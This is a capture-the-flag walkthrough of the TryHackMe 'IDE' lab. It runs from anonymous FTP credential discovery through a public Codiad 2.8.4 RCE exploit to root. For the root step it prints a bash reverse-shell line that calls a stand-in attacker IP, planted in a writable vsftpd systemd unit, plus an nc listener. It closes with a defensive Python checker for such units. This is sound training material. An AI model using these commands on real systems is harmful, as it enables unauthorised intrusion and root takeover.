بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ

In the name of ALLAH, the most Gracious, the most Merciful.

Hello world, Amrou is here! I'm back with another walkthrough. Before we dive into the write-up, I highly encourage you to give the lab a complete try on your own first. Learning from your mistakes along the way is the best way to grow. But if you're ready to see how it's done, LET'S GO!


1) Reconnaissance

Let's kick things off with an Nmap scan to see what ports are open:

nmap -v -p- <ip-address>
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
62337/tcp open  unknown
nmap -v -sCV -p <open-ports> <ip-address> -oN scan.nmap
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
...
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
...
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
...
62337/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
...

Looking at the FTP server, we saw that it accepts anonymous logins. We logged in and found a hidden "…" directory, so we cd into it:


We found a file named '-' there, so we downloaded it to our local machine with the command: get -

Then we renamed it as follows:


We found some credentials, so we made a note of them for later.

2) Foothold

Looking at the first Apache server on port 80, we can see it only hosts the default static web page.

So we head toward the second server on port 62337:


There we found a Codiad login form, so we tried the credentials we found above:


And it did work!!

As shown in the above picture, the target is running Codiad version 2.8.4. Some searching revealed that this version is vulnerable to authenticated remote code execution (RCE).

So we download the following exploit to our local machine:

Then we run it as follows:

python3 exploit http://<machine-ip>:62337/ john password <your-tun0-ip> <your-port> linux

As instructed above, we run these two commands in separate tabs, then press Y to continue:


And we got our reverse shell!!

How it works under the hood: Codiad version 2.8.4 suffers from an authenticated Remote Code Execution (RCE) vulnerability caused by improper input validation in its search component. By passing crafted commands through the search parameters, an attacker with valid credentials can make the application execute arbitrary system commands. The fix on the defensive side is to keep Codiad off version 2.8.4 (or off the internet entirely) and never reuse credentials that are sitting in a world-readable file on an anonymous FTP share.


I tried to cat the user flag, but it seems we don't have permission to do so.

So I tried to cat the .bash_history file:


And we got drac's credentials!!

We su to drac:


Then:


We got the user flag!!

3) Privilege escalation

We start by listing our sudo privileges using: sudo -l


And as we can see, we're able to run service vsftpd restart as root.

Searching for how we could abuse that command led to this article:

First off, find the vsftpd service unit files using:

find / -name "*vsftpd*"

We found the following locations:

/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service

I checked our permissions on the vsftpd unit files and found that we have write permission on the second one (a unit file that an unprivileged user can edit is the whole problem here: systemd runs every Exec* directive in it as root).

All that remains is to add our payload to the file:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target

Then we need to reload the systemd daemon so it picks up the modified unit:

systemctl daemon-reload

On the local machine, start a listener to catch the shell:

nc -lvnp 4444

Now run the command that we are allowed to execute with sudo:

sudo /usr/sbin/service vsftpd restart

And we got our reverse shell!!

How it works: systemd .service files control how background services run. By adding the ExecStartPre directive, we are telling systemd to execute our reverse shell payload with root privileges immediately before it attempts to start the actual FTP service. The root cause is not the sudo rule by itself but the combination of a root-executed restart with a unit file that a low-privileged user can write.
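A defender-side check for exactly this misconfiguration, added here as an example (it is my own code, not part of the original post or of systemd): it parses a unit file, flags Exec* directives that spawn a shell reverse connection, and reports a unit owned by a non-root user or writable by group/other, which is the condition that let drac edit vsftpd.service. The reverse-shell patterns are an assumed heuristic, not an exhaustive list.

```python
import re
import stat

# Directives systemd runs as root when the unit is (re)started: any of them is an
# injection point when the unit file is writable by an unprivileged user.
EXEC_KEYS = ("ExecStartPre", "ExecStart", "ExecStartPost", "ExecReload",
             "ExecStop", "ExecStopPost")
# Heuristic patterns (an assumption, not an exhaustive list) for a shell-based
# reverse connection planted in an Exec* directive.
SUSPICIOUS = re.compile(r"/dev/tcp/|bash\s+-i|mkfifo", re.IGNORECASE)


def parse_exec_directives(unit_text):
    """Return (key, value) pairs for every Exec* line in the [Service] section."""
    section, found = None, []
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Service" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key in EXEC_KEYS:
                found.append((key, value))
    return found


def suspicious_directives(unit_text):
    """Return the Exec* directives whose command matches a reverse-shell pattern."""
    return [(k, v) for k, v in parse_exec_directives(unit_text) if SUSPICIOUS.search(v)]


def mode_issues(uid, mode):
    """Explain why a unit file with this owner uid and permission bits is unsafe."""
    issues = []
    if uid != 0:
        issues.append("owned by uid %d, not root" % uid)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("group/other writable (mode %o)" % mode)
    return issues


# Constructed sample: the tampered vsftpd unit from the walkthrough, trimmed.
TAMPERED_UNIT = """[Unit]
Description=vsftpd FTP server
[Service]
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'
"""
```

To run it against a real unit, pass os.stat(path).st_uid and stat.S_IMODE(os.stat(path).st_mode) to mode_issues() and the file contents to suspicious_directives(); both should come back empty on a healthy host.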


That's it for the root flag too!!

That's it for today, guys. I hope you enjoyed the walkthrough and learned from it. Until next time, Asalamo alaikom.

References:

The lab link: https://tryhackme.com/room/ide